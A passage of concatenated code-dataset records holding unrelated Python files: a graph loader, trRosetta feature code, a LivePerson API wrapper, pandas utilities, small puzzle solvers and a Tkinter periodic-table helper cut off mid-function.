in G.successors(node):\n toList.append(G.nodes[suc]['nodeUniqueID'])\n #toNodeList.append(G.nodes[suc]['nodeName'])\n G.nodes[node]['from'] = fromList\n G.nodes[node]['to'] = toList\n G.nodes[node]['Hyperedgeconection'] = fromList + toList\n # todo:include connected normal edge info. no need to do this? 
because these edges are part of a hyperedge and have no edge ID\n # for fromNode in fromNodeList:\n # print(G.edges[(fromNode, node)])\n # G.nodes[node]['inComingEdge']=G.edges[(fromNode,node)]['edgeUniqueID']\n # G.nodes[node]['outComingEdge'] = G.edges[(node, toNodeList[0])]['edgeUniqueID']\n\n\n def addSenderReceiverInfoToEdge(self):\n # replace connected node name with node unique ID in edges\n for G in self.graphList:\n for edge in G.edges:\n if (G.nodes[edge[0]]['class'] != \"DataFlowHyperedge\" and G.nodes[edge[1]]['class'] != \"DataFlowHyperedge\" and\n G.nodes[edge[0]]['class'] != \"controlFlowHyperEdge\" and G.nodes[edge[1]]['class'] != \"controlFlowHyperEdge\"):\n fromNode = G.nodes[edge[0]]['nodeUniqueID']\n toNode = G.nodes[edge[1]]['nodeUniqueID']\n G.edges[edge]['from'] = fromNode\n G.edges[edge]['to'] = toNode\n G.edges[edge]['edgeConection'] = [fromNode,toNode]\n elif(\"Hyperedge\" in G.nodes[edge[0]]['class']):\n G.edges[edge]['connectedHyperedge'] = G.nodes[edge[0]]['hyperedgeUniqueID']\n elif(\"Hyperedge\" in G.nodes[edge[1]]['class']):\n G.edges[edge]['connectedHyperedge'] = G.nodes[edge[1]]['hyperedgeUniqueID']\n\n\n\n\n def readGraphsFromDot(self):\n path = self._path+self._data_fold+\"/\"\n if self._file_type==\".smt2\":\n self.read_graph(path, suffix=\".smt2\")\n if self._file_type == \".c\":\n self.read_graph(path, suffix=\".c\")\n\n\n\n def read_graph(self,path,suffix):\n if self._split_flag==0:\n print(\"read\",suffix,\"files\")\n number_of_graphs=len(glob.glob(path + '*' + suffix + '.gv'))\n print(\"graph file\", number_of_graphs)\n print(\"argument file\", len(glob.glob(path + '*' + suffix + '.arguments')))\n gv_list=sorted(glob.glob(path + '*' + suffix + '.gv'))\n argument_list=sorted(glob.glob(path + '*' + suffix + '.arguments'))\n start=time.time()\n for fileGraph, fileArgument in zip(gv_list,\n argument_list):\n fileName = fileGraph[:fileGraph.find(suffix + \".gv\") + len(suffix)]\n fileName = fileName[fileName.rindex(\"/\") + 1:]\n print(fileName)\n # read graph\n print(fileGraph)\n #hornGraph = Source.from_file(fileGraph)\n G = nx.DiGraph(nx.drawing.nx_pydot.read_dot(fileGraph))\n self.graphList.append(G)\n\n # read argument\n print(fileArgument)\n f = open(fileArgument, \"r\")\n arguments = f.read()\n f.close()\n self.argumentList.append(arguments)\n print(\"nx.DiGraph time:\", time.time() - start)\n else:\n print(\"read\", suffix, \"files\")\n number_of_graphs = len(glob.glob(path + '*' + suffix + '.gv'))\n print(\"total graph file\", number_of_graphs)\n print(\"total argument file\", len(glob.glob(path + '*' + suffix + '.arguments')))\n gv_list = sorted(glob.glob(path + '*' + suffix + '.gv'))\n argument_list = sorted(glob.glob(path + '*' + suffix + '.arguments'))\n buket_size=math.ceil(len(gv_list)/self._buckets)\n if self._split_flag id_min\n\t\tw = 1.0/tf.reduce_sum(tf.cast(id_mask, dtype=tf.float32),-1)\n\treturn w\n\n# shrunk covariance inversion\ndef fast_dca(msa1hot, weights, penalty = 4.5):\n\n\tnr = tf.shape(msa1hot)[0]\n\tnc = tf.shape(msa1hot)[1]\n\tns = tf.shape(msa1hot)[2]\n\n\twith tf.name_scope('covariance'):\n\t\tx = tf.reshape(msa1hot, (nr, nc * ns))\n\t\tnum_points = tf.reduce_sum(weights) - tf.sqrt(tf.reduce_mean(weights))\n\t\tmean = tf.reduce_sum(x * weights[:,None], axis=0, keepdims=True) / num_points\n\t\tx = (x - mean) * tf.sqrt(weights[:,None])\n\t\tcov = tf.matmul(tf.transpose(x), x)/num_points\n\n\twith tf.name_scope('inv_convariance'):\n\t\tcov_reg = cov + tf.eye(nc * ns) * penalty / tf.sqrt(tf.reduce_sum(weights))\n\t\tinv_cov 
= tf.linalg.inv(cov_reg)\n\t\t\n\t\tx1 = tf.reshape(inv_cov,(nc, ns, nc, ns))\n\t\tx2 = tf.transpose(x1, [0,2,1,3])\n\t\tfeatures = tf.reshape(x2, (nc, nc, ns * ns))\n\t\t\n\t\tx3 = tf.sqrt(tf.reduce_sum(tf.square(x1[:,:-1,:,:-1]),(1,3))) * (1-tf.eye(nc))\n\t\tapc = tf.reduce_sum(x3,0,keepdims=True) * tf.reduce_sum(x3,1,keepdims=True) / tf.reduce_sum(x3)\n\t\tcontacts = (x3 - apc) * (1-tf.eye(nc))\n\n\treturn tf.concat([features, contacts[:,:,None]], axis=2)\n\ndef keras_collect_features(inputs, wmin=0.8) :\n\tf1d_seq_batched, msa1hot_batched = inputs\n\n\tf1d_seq = f1d_seq_batched[0, ...]\n\tmsa1hot = msa1hot_batched[0, ...]\n\n\tnrow = K.shape(msa1hot)[0]\n\tncol = K.shape(msa1hot)[1]\n\n\tw = reweight(msa1hot, wmin)\n\n\t# 1D features\n\tf1d_pssm = msa2pssm(msa1hot, w)\n\n\tf1d = tf.concat(values=[f1d_seq, f1d_pssm], axis=1)\n\tf1d = tf.expand_dims(f1d, axis=0)\n\tf1d = tf.reshape(f1d, [1,ncol,42])\n\n\t# 2D features\n\tf2d_dca = tf.cond(nrow>1, lambda: fast_dca(msa1hot, w), lambda: tf.zeros([ncol,ncol,442], tf.float32))\n\tf2d_dca = tf.expand_dims(f2d_dca, axis=0)\n\n\tf2d = tf.concat([tf.tile(f1d[:,:,None,:], [1,1,ncol,1]), \n\t\t\t\t\ttf.tile(f1d[:,None,:,:], [1,ncol,1,1]),\n\t\t\t\t\tf2d_dca], axis=-1)\n\tf2d = tf.reshape(f2d, [1,ncol,ncol,442+2*42])\n\n\treturn f2d\n\n#trRosetta Saved Model definition\n\ndef pssm_func(inputs, diag=0.0):\n\tx,y = inputs\n\t_,_,L,A = [tf.shape(y)[k] for k in range(4)]\n\twith tf.name_scope('1d_features'):\n\t\t# sequence\n\t\tx_i = x[0,:,:20]\n\t\t# pssm\n\t\tf_i = y[0,0, :, :]\n\t\t# entropy\n\t\th_i = tf.zeros((L,1))\n\t\t#h_i = K.sum(-f_i * K.log(f_i + 1e-8), axis=-1, keepdims=True)\n\t\t# tile and combined 1D features\n\t\tfeat_1D = tf.concat([x_i,f_i,h_i], axis=-1)\n\t\tfeat_1D_tile_A = tf.tile(feat_1D[:,None,:], [1,L,1])\n\t\tfeat_1D_tile_B = tf.tile(feat_1D[None,:,:], [L,1,1])\n\n\twith tf.name_scope('2d_features'):\n\t\tic = diag * tf.eye(L*A)\n\t\tic = tf.reshape(ic,(L,A,L,A))\n\t\tic = tf.transpose(ic,(0,2,1,3))\n\t\tic = tf.reshape(ic,(L,L,A*A))\n\t\ti0 = tf.zeros([L,L,1])\n\t\tfeat_2D = tf.concat([ic,i0], axis=-1)\n\n\t\tfeat = tf.concat([feat_1D_tile_A, feat_1D_tile_B, feat_2D],axis=-1)\n\t\treturn tf.reshape(feat, [1,L,L,442+2*42])\n\ndef load_saved_predictor(model_path, msa_one_hot=None) :\n\t\n\tsaved_model = load_model(model_path, custom_objects = {\n\t\t'InstanceNormalization' : InstanceNormalization,\n\t\t'reweight' : reweight,\n\t\t'wmin' : 0.8,\n\t\t'msa2pssm' : msa2pssm,\n\t\t'tf' : tf,\n\t\t'fast_dca' : fast_dca,\n\t\t'keras_collect_features' : pssm_func#keras_collect_features\n\t})\n\t#print(saved_model.summary())\n\n\tdef _initialize_predictor_weights(predictor_model, saved_model=saved_model, model_path=model_path) :\n\t\t#Load pre-trained model\n\t\t#print(saved_model.summary())\n\t\t#predictor_model.load_weights(model_path, by_name=True)\n\t\tprint(\"No weights copied.\")\n\n\tdef _load_predictor_func(sequence_input, saved_model=saved_model) :\n\t\t\n\t\tmsa_one_hot_var = Lambda(lambda x: K.concatenate([K.expand_dims(x, axis=1), K.zeros((K.shape(x)[0], 1, K.shape(x)[1], 1, 1))], axis=-2))(sequence_input)\n\t\t\n\t\tp_dist, p_theta, p_phi, p_omega = Lambda(lambda x: saved_model([x[0][..., 0], x[1][..., 0]]))([sequence_input, msa_one_hot_var])#saved_model([sequence_input, msa_one_hot_var])\n\n\t\tp_dist_clipped = Lambda(lambda x: K.clip(x, K.epsilon(), 1. - K.epsilon()))(p_dist)\n\t\tp_theta_clipped = Lambda(lambda x: K.clip(x, K.epsilon(), 1. 
- K.epsilon()))(p_theta)\n\t\tp_phi_clipped = Lambda(lambda x: K.clip(x, K.epsilon(), 1. - K.epsilon()))(p_phi)\n\t\tp_omega_clipped = Lambda(lambda x: K.clip(x, K.epsilon(), 1. - K.epsilon()))(p_omega)\n\t\t\n\t\tpredictor_inputs = []\n\t\tpredictor_outputs = [p_dist_clipped, p_theta_clipped, p_phi_clipped, p_omega_clipped]\n\n\t\treturn predictor_inputs, predictor_outputs, _initialize_predictor_weights\n\n\treturn _load_predictor_func\n","sub_path":"analysis/rosetta/trrosetta_single_model_no_msa_batched_simpler_1d_features_2.py","file_name":"trrosetta_single_model_no_msa_batched_simpler_1d_features_2.py","file_ext":"py","file_size_in_byte":8753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"156397622","text":"#coding:utf-8\n__all__ = ['count_binary']\n\nfrom score_card_model.utils.check import check_array_binary\n\n\ndef count_binary(a, event=1):\n if not check_array_binary(a):\n raise AttributeError(\"array must be a binary array\")\n try:\n event_count = (a == event).sum()\n except AttributeError as ae:\n raise AttributeError(\"need a event\")\n non_event_count = a.shape[-1] - event_count\n return event_count, non_event_count\n","sub_path":"ScoreCardModel/utils/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"140068945","text":"import concurrent.futures\nimport math\nimport re\nimport time\nfrom lp_api_wrapper.parsers import Engagements\nfrom lp_api_wrapper.util.wrapper_base import WrapperBase, APIMethod\n\n\nclass EngagementHistory(WrapperBase):\n \"\"\"\n Python Wrapper for the LivePerson Engagement History API\n\n Documentation:\n https://developers.liveperson.com/data-engagement-history-methods.html\n \"\"\"\n\n def __init__(self, auth, company=None, source=\"LPApiWrapper\", max_retry=3, wait_factor=15):\n\n super().__init__(auth=auth)\n\n # Establish Base URL\n domain = self.get_domain(\n account_id=auth.account_id, service_name='engHistDomain')\n self.base_url = f'https://{domain}/interaction_history/api/account/{auth.account_id}'\n self.company = company\n self.source = source\n self.max_retry = max_retry\n self.wait_factor = wait_factor\n\n def engagements(self, body, offset=0, limit=100, sort=None):\n \"\"\"\n Documentation:\n https://developers.liveperson.com/data_api-engagement-history-methods.html\n\n * Returns a single offset of data within start time range *\n\n :param body: dict \n :param offset: int\n :param limit: int\n :param sort: str\n :return Decoded JSON data\n \"\"\"\n attempt = 0\n while attempt < self.max_retry:\n # set wait time\n wait_time = attempt * self.wait_factor\n # wait\n time.sleep(wait_time)\n # increment attempt\n attempt += 1 \n try:\n url = f'{self.base_url}/interactions/search'\n params = {\n 'offset': offset,\n 'limit': limit,\n 'sort': sort,\n 'company': self.company,\n 'source': self.source \n }\n api_result = self.process_request(\n method=APIMethod.POST,\n url=url,\n url_parameters=params,\n body=body\n )\n break\n except Exception:\n api_result = None\n print(\n f'[EHAPI Fail]: attempt={attempt}of{self.max_retry} url={url} params={params} body={body}')\n return api_result\n\n def all_engagements(self, body, max_workers=7, debug=0, parse_data=False, offset=0, max_limit=None):\n \"\"\"\n Documentation:\n https://developers.liveperson.com/data_api-engagement-history-methods.html\n\n * Returns all offsets of data within start time range *\n\n :param body: dict \n 
:param max_workers: int (Max # of concurrent requests)\n :param debug: int (Status of API requests: 1=full, 2=summary, default=0)\n :param parse_data: bool (Returns a parsed Engagements data object.)\n :param offset: Start offset\n :param max_limit: Max conversations to retrieve. Default -1, is all conversations based on the body\n :return List of interaction history records as decoded JSON data\n \"\"\"\n\n # Grab first offset of data.\n initial_data = self.engagements(body=body, offset=0)\n\n # Number of conversations in date range that was selected in the body start parameters.\n count = initial_data['_metadata']['count']\n\n # Retrieve site ID from URL\n lesite = re.search('account/(.*)', self.base_url)\n lesite = lesite.group(1)\n\n # Max number of retrivals per call\n limit = 100\n offset_start = offset\n # Total number of conversation to actually retrieve\n if (max_limit is None):\n total_conversation = count - offset\n last_conversation = count\n else:\n if (count > max_limit + offset):\n total_conversation = max_limit\n last_conversation = max_limit + offset\n else:\n total_conversation = count - offset\n last_conversation = count\n\n # If there are no conversations in data range, return nothing.\n if count == 0:\n if debug == 1:\n print('[EHAPI Status]: There are 0 records!')\n return None\n else:\n if debug >= 1:\n print(\n f'[EHAPI Summary]: count={total_conversation} reqs={math.ceil(total_conversation/limit)} workers={max_workers} leSite={lesite}')\n\n # Set up delivery options.\n engagements = Engagements() if parse_data else []\n\n # Multi-threading to handle multiple requests at a time.\n with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:\n\n # Create all future requests for the rest of the offsets in the body's data range.\n future_requests = {}\n last_call = False\n while (not last_call):\n if (offset_start + limit >= last_conversation):\n limit = last_conversation - offset_start\n future_requests[executor.submit(\n self.engagements, body, offset_start, limit)] = offset_start\n last_call = True\n else:\n future_requests[executor.submit(\n self.engagements, body, offset_start, limit)] = offset_start\n offset_start = offset_start + limit\n\n for future in concurrent.futures.as_completed(future_requests):\n\n if debug == 1:\n print(\n f'[EHAPI Offset Status]: {future_requests[future] - offset} of {total_conversation} records completed!')\n\n # Grab dict with 'interactionHistoryRecords' from the request. 
Removing any '_metadata' info.\n records = future.result()['interactionHistoryRecords']\n\n # Store results\n if parse_data:\n engagements.append_records(\n records=[record for record in records])\n else:\n engagements.extend([record for record in records])\n\n return engagements\n\n def all_engagements_by_chunks(self, body, max_workers=7, debug=0, parse_data=False):\n \"\"\"\n Documentation:\n https://developers.liveperson.com/data_api-messaging-interactions-conversations.html\n\n * Returns all offsets of data within start time range *\n\n :param body: dict \n :param max_workers: int (Max # of concurrent requests)\n :param debug: int (Status of API requests: 1=full, 2=summary, default=0)\n :param parse_data: bool (Returns a parsed Engagements data object.)\n :return List of conversations history records as decoded JSON data\n \"\"\"\n\n # Grab first offset of data.\n initial_data = self.engagements(body=body, offset=0)\n\n # Number of conversations in date range that was selected in the body start parameters.\n count = initial_data['_metadata']['count']\n\n # Retrieve site ID from URL\n lesite = re.search('account/(.*)', self.base_url)\n lesite = lesite.group(1)\n\n # Max number of retrivals per call\n limit_per_call = 100\n\n # If there are no conversations in data range, return nothing.\n if count == 0:\n if debug == 1:\n print('[EHAPI Status]: There are 0 records!')\n return None\n else:\n if debug >= 1:\n print(\n f'[EHAPI Summary]: count={count} reqs={math.ceil(count/limit_per_call)} workers={max_workers} leSite={lesite}')\n chunk_size = 500 # MUST be greater than the limit_per_call\n chunk_offset = 0\n offset = 0\n chunks = math.ceil(count/chunk_size)\n\n # E.g Count =468, chunk_size =150 then chunks 4\n # Will iterate 4 times\n for iterat in range(1, chunks + 1):\n engagements = Engagements() if parse_data else []\n future_requests = {}\n with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:\n\n # First iteration: chunk_offset =0 , chunk_offset + chunk_size = 150 , limit_per_call=100, list_offset = [0,100]\n # Second iteration: chunk_offset =150 , chunk_offset + chunk_size = 300 , limit_per_call=100, list_offset = [150,250]\n # Fourth iteration: list_offset = [450,600]\n list_offset = range(\n chunk_offset, chunk_offset + chunk_size, limit_per_call)\n for elem in list_offset:\n if(elem < count): # If the element is greater than the total count, we dont need to make a call starting with that offset. Fourth iteration 600>468\n # For second iteration, second element: 250 + 100 > 150 + 150; For fourth iteration, second element: won't pass previous if\n if (elem + limit_per_call > chunk_offset + chunk_size):\n limit_per_call = chunk_size - limit_per_call # 150 - 100 = 50\n future_requests[executor.submit(\n self.engagements, body, offset, limit_per_call)] = offset\n offset = offset + limit_per_call\n\n for future in concurrent.futures.as_completed(future_requests):\n\n if debug == 1:\n print(\n f'[EHAPI Offset Status]: {future_requests[future]} of {count} records completed!')\n\n # Grab dict with 'conversationHistoryRecords' from the request. 
Removing any '_metadata' info.\n records = future.result()['interactionHistoryRecords']\n\n # Store results.\n if parse_data:\n engagements.append_records(\n records=[record for record in records])\n else:\n engagements.extend([record for record in records])\n\n limit_per_call = 100\n chunk_offset = chunk_offset + chunk_size\n yield engagements\n","sub_path":"lp_api_wrapper/apis/engagement_history.py","file_name":"engagement_history.py","file_ext":"py","file_size_in_byte":10192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"647236065","text":"import pandas as pd\n\nexcel_file='Sample_data.xlsx'\nbatches=pd.read_excel(excel_file)\n\nprint(batches.head())\n\nbatches_sheet1=pd.read_excel(excel_file,sheet_name=0,index_col=0)\nprint(batches_sheet1)\n\nxlsx=pd.ExcelFile(excel_file)\nbatches_sheets=[]\n\nfor sheet in xlsx.sheet_names:\n\tprint(sheet)\n\n\tbatches_sheets.append(xlsx.parse(sheet))\n\nbatches=pd.concat(batches_sheets)\nprint(batches_sheets)\n","sub_path":"pandas_excel_operations.py","file_name":"pandas_excel_operations.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249309366","text":"# Default imports\nimport pandas as pd\n\n# Data\nny_housing = pd.read_csv('data/train.csv')\n# Selecting 4 most relevant variables from the dataset for the Cleaning and Preprocessing.\nhousing_data = ny_housing[['MasVnrArea', 'GrLivArea', 'LotShape', 'GarageType', 'SalePrice']]\n\n\n# Write your code here:\ndef outlier_removal(dataset):\n for i in dataset.columns:\n if dataset[i].dtypes == 'int64' or dataset[i].dtypes == 'float64':\n th = dataset[i].quantile(0.95)\n data = dataset[dataset[i]< th]\n data = data[1:1306]\n return data\n","sub_path":"q02_outlier_removal/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"103739469","text":"\n\nclass Menu():\n\n def __init__(self,name):\n self.parentMenu = None\n self.childMenu = {}\n self.siblinMenu = None\n self.name = name \n self.actionName = None \n\n def action(self):\n print(self.name+\" has been selected.\")\n if len(self.childMenu):\n for m in self.childMenu:\n print(m)\n\n inp_option = str(input(\"Please select one of the options\")).rstrip().lstrip()\n self.childMenu[inp_option].action()\n else:\n print(self.name+\" action has been performed.\")\n return 1\n\n\n def addChildMenu(self,cname):\n self.childMenu[cname] = Menu(cname)\n self.childMenu[cname].parentMenu = self \n return self.childMenu[cname]\n \n\n\n\nclass MainMenu():\n \n def __init__(self):\n \"\"\"\n Handles all the menu and the state of the system \n \"\"\"\n pass\n\n\n\nclass EmployeeData():\n\n def __init__(self,name,id):\n self.name = name \n self.id = id\n\n def getdata(self):\n data = \"Name : \"+self.name + \"; Id: \"+ str(self.id)\n return data \n\n def updateData(self, name=None, id=None):\n if name:\n self.name = name\n if id:\n self.id = id\n\n \n\nif __name__ == \"__main__\":\n m = Menu(\"MainMenu\")\n c = m.addChildMenu(\"Create\")\n c.addChildMenu(\"Type Senior\")\n c.addChildMenu(\"Type Junior\")\n\n m.action()\n","sub_path":"pythonCodes/simulateMenu.py","file_name":"simulateMenu.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119921747","text":"import os\nimport sys\nimport textwrap\n\nimport click\n\ntry:\n from 
IPython.terminal.embed import InteractiveShellEmbed as InteractiveConsole\n is_ipython = True\nexcept ImportError:\n from code import InteractiveConsole\n is_ipython = False\n\nfrom eth_rpc_client import Client\n\nimport populus\nfrom populus import utils\nfrom populus.contracts import (\n package_contracts,\n)\n\nfrom .main import main\n\n\n@main.command()\ndef attach():\n \"\"\"\n Enter a python shell with contracts and blockchain client\n available.\n \"\"\"\n project_dir = os.path.abspath(os.getcwd())\n contracts_meta = utils.load_contracts(project_dir)\n\n context = {\n 'contracts': package_contracts(contracts_meta),\n 'client': Client('127.0.0.1', '8545'),\n }\n\n contract_names = ', '.join(sorted(contracts_meta.keys()))\n\n banner = textwrap.dedent(\n \"\"\"\n Python: {python_version}\n\n Populus: v{populus_version}\n\n Project Path: {project_dir}\n\n contracts -> Contract classes\n client -> Blockchain client ({client_type})\n\n Contracts: {contracts}\n \"\"\"\n ).format(\n python_version=sys.version.partition('\\n')[0],\n populus_version=populus.__version__,\n project_dir=project_dir,\n client_type=\"json-rpc\",\n contracts=click.wrap_text(\n contract_names, initial_indent='', subsequent_indent=' ' * 4,\n ),\n ).strip()\n\n if is_ipython:\n shell = InteractiveConsole(user_ns=context)\n else:\n shell = InteractiveConsole(context)\n shell.interact(banner)\n","sub_path":"populus/cli/attach_cmd.py","file_name":"attach_cmd.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17727042","text":"#!/usr/bin/env python\n# BSD Licence\n# Copyright (c) 2011, Science & Technology Facilities Council (STFC)\n# All rights reserved.\n#\n# See the LICENSE file in the source distribution of this software for\n# the full license text.\n\n# subset_2d_cdat.py\n#\n#\n# Scripts implementing this test should subset a dataset to a given\n# bounding box. 
Scripts can assume the given variable is a 2D field.\n#\n# usage: %prog dataset variable bbox outputfile\n#\n# where bbox = 'lon0,lon1,lat0,lat1'\n\nimport sys\nimport cdms2\n\ndataset, variable, bbox, outfile = sys.argv[1:]\n\nlon0, lon1, lat0, lat1 = (float(x) for x in bbox.split(','))\n\nds = cdms2.open(dataset)\nvar = ds[variable]\n\nsubset = var(longitude=(lon0, lon1),\n latitude=(lat0, lat1))\n\nout_ds = cdms2.open(outfile, 'w')\nout_ds.write(subset)\n\nout_ds.close()\n","sub_path":"scripts/clients/subset2d_cdat.py","file_name":"subset2d_cdat.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"367878131","text":"dy = [1,-1,0,0]\ndx = [0,0,-1,1]\nfrom collections import deque\ndef solution(maps):\n n = len(maps)\n m = len(maps[0])\n visit = [[False for i in range(m)] for i in range(n)]\n flag = False\n q = deque()\n q.append((0,0))\n visit[0][0] = True\n\n while q:\n y,x = q.popleft()\n\n for i in range(4):\n ny = y + dy[i]\n nx = x + dx[i]\n if 0<= ny < n and 0<= nx < m and maps[ny][nx] != 0 and visit[ny][nx] == False:\n v = maps[y][x] + 1\n if maps[ny][nx] != 1:\n maps[ny][nx] = min(v,maps[ny][nx])\n else:\n maps[ny][nx] = v\n visit[ny][nx] = True\n\n q.append((ny,nx))\n\n if y == n-1 and x == m-1:\n flag = True\n break\n\n if flag :\n return maps[-1][-1]\n else:\n return -1\n\n\nprint(solution([[1,0,1,1,1],[1,0,1,0,1],[1,0,1,1,1],[1,1,1,0,1],[0,0,0,0,1]]))\nprint(solution([[1,0,1,1,1],[1,0,1,0,1],[1,0,1,1,1],[1,1,1,0,0],[0,0,0,0,1]]))","sub_path":"Programmers/Programmers_프로그래밍 마에스터_게임 맵 최단거리.py","file_name":"Programmers_프로그래밍 마에스터_게임 맵 최단거리.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490375812","text":"import sys\n\nsys.stdin = open('input.txt', 'r')\n\n\nclass Ball:\n\n def __init__(self, i, j):\n self.i = i\n self.j = j\n self.pair = None\n self.state = 'stop'\n\n def is_wall_or_ball(self, ni, nj):\n global board\n\n value = board[ni][nj]\n if value == '#':\n return True\n elif self.pair.i == ni and self.pair.j == nj and not self.pair.state == 'goal': # ignore the paired ball if it is already in the 'goal' state.\n return True\n return False\n\n def move(self, direction):\n global board\n\n d = [(-1, 0), (1, 0), (0, -1), (0, 1)] # up, down, left, right\n\n dx = d[direction][0]\n dy = d[direction][1]\n\n i = self.i\n j = self.j\n\n # next coordinates\n ni = i + dx\n nj = j + dy\n\n if board[ni][nj] == 'O': # on the goal cell, change the state to 'goal'\n self.state = 'goal'\n\n elif not self.is_wall_or_ball(ni, nj): # if it is not a wall, move to that position\n self.i = ni\n self.j = nj\n\n else: # if there is a wall or the other ball, change the state to 'stop'.\n self.state = 'stop'\n\n\ndef who_first_move(who, red, blue, direction): # which ball moves first, the red ball instance, the blue ball instance, the tilt direction\n red.state = 'move'\n blue.state = 'move'\n\n while True: # move the balls in turn until both are in the 'stop' or 'goal' state\n if who == 'blue':\n if blue.state == 'move':\n blue.move(direction)\n if red.state == 'move':\n red.move(direction)\n\n elif who == 'red':\n if red.state == 'move':\n red.move(direction)\n if blue.state == 'move':\n blue.move(direction)\n\n if red.state in ['stop', 'goal'] and blue.state in ['stop', 'goal']:\n break\n\n\ndef BFS(red_start, blue_start):\n # the queue starts as [red ball instance at its start position, blue ball instance at its start position, directions tilted so far, the direction used last]\n q = [[red_start, blue_start, [], set()]]\n\n while q:\n prev_red, prev_blue, moving, prev = q.pop(0)\n if moving[-3:] not in [[0, 1, 0], [1, 0, 1], [2, 3, 2], [3, 2, 3]]: # skip tilt sequences that return to the same position (e.g. up, down, up)
\n\n for direction in {0, 1, 2, 3} - prev: # the next tilt direction is any direction except the one just used.\n # create fresh objects at the pre-move positions to avoid sharing references\n red = Ball(prev_red.i, prev_red.j)\n blue = Ball(prev_blue.i, prev_blue.j)\n red.pair = blue\n blue.pair = red\n\n if direction == 0: # tilt up -> the ball with the smaller i moves first\n if red.i > blue.i:\n who_first_move('blue', red, blue, direction) # move the blue ball first\n else:\n who_first_move('red', red, blue, direction) # move the red ball first\n elif direction == 1: # tilt down -> the ball with the larger i moves first\n if red.i > blue.i:\n who_first_move('red', red, blue, direction)\n else:\n who_first_move('blue', red, blue, direction)\n elif direction == 2: # tilt left -> the ball with the smaller j moves first\n if red.j > blue.j:\n who_first_move('blue', red, blue, direction)\n else:\n who_first_move('red', red, blue, direction)\n elif direction == 3: # tilt right -> the ball with the larger j moves first\n if red.j > blue.j:\n who_first_move('red', red, blue, direction)\n else:\n who_first_move('blue', red, blue, direction)\n\n # from here on, both marbles have finished moving in that direction ..\n next_moving = moving + [direction]\n\n if red.state == 'goal' and blue.state == 'goal':\n pass\n elif blue.state == 'goal':\n pass\n elif red.state == 'goal':\n return len(next_moving)\n elif len(next_moving) < 10:\n q.append([red, blue, next_moving, {direction}])\n\n return -1\n\n\n# import timeit\n# start = timeit.default_timer()\n\nN, M = map(int, input().split())\nboard = [list(input()) for _ in range(N)]\n\n# find the initial positions of the balls\nfor i in range(N):\n for j in range(M):\n if board[i][j] == 'R':\n red_ball = Ball(i, j)\n elif board[i][j] == 'B':\n blue_ball = Ball(i, j)\n\n# pair the balls with each other\nred_ball.pair = blue_ball\nblue_ball.pair = red_ball\n\n# start the search\nprint(BFS(red_ball, blue_ball))\n\n# end = timeit.default_timer()\n# print(\"{}ms\".format((end - start) * 1000))\n","sub_path":"PYTHON/BAEKJOON/13460_구슬탈출2/13460_2.py","file_name":"13460_2.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"369949785","text":"# -*- coding: utf-8 -*-\n# !/usr/bin/env python\n\nimport os\nfrom tkinter import *\n\n##import PIL as pl\n\ndd = []\n\n\ndef callback(event):\n print(dir(event))\n print(\"you clicked at\", event.x, event.y, event.x_root)\n print(event.char, event.keycode, event.widget)\n\n\ndef elem(k):\n print((' k %d' % k))\n\n\ndef read_elements():\n import csv\n elm = {}\n eln = {}\n with open(os.path.join(os.path.dirname(__file__), 'elements.csv'), \"r\") as flf:\n rr = csv.DictReader(flf, delimiter='\\t')\n for rw in rr:\n elm[rw['El']] = {'NN': int(rw['NN']), 'Ro': rw['Ro'], 'A': rw['A']}\n eln[int(rw['NN'])] = {'name': rw['El'], 'Ro': rw['Ro'], 'A': rw['A']}\n\n pass\n\n return (eln, elm)\n\n\ndef read_elements_x(name):\n with open(name, 'rt') as xfl:\n be = {}\n xfl.readline()\n for line in xfl:\n t = line.split()\n be[int(t[0])] = [t[1], float(t[2]), float(t[3])]\n sn = {}\n for k in list(be.keys()):\n sn[be[k][0]] = int(k)\n return (be, sn)\n\n\ndef min0ne(f):\n def tmp(*args, **kwargs):\n res = f(*args, **kwargs)\n\n return res[0] - 1, res[1] - 1\n\n return tmp\n\n\n@min0ne\ndef z2rc(Z_):\n \"\"\"\n \"\"\"\n endCol_ = 18\n\n if Z_ == 1:\n return (1, 1)\n if Z_ == 2:\n return (1, endCol_)\n\n if Z_ in (3, 4):\n return (2, 1 + Z_ - 3)\n if Z_ in range(5, 11):\n return (2, 8 + Z_)\n\n if Z_ in (11, 12):\n return (3, 1 + Z_ - 11)\n if Z_ in range(13, 19):\n return (3, Z_)\n\n if Z_ in range(19, 37):\n return (4, 1 + Z_ - 19)\n if Z_ in range(37, 55):\n return (5, 1 + Z_ - 37)\n\n if Z_ in (55, 56, 57):\n return (6, 1 + Z_ - 55)\n 
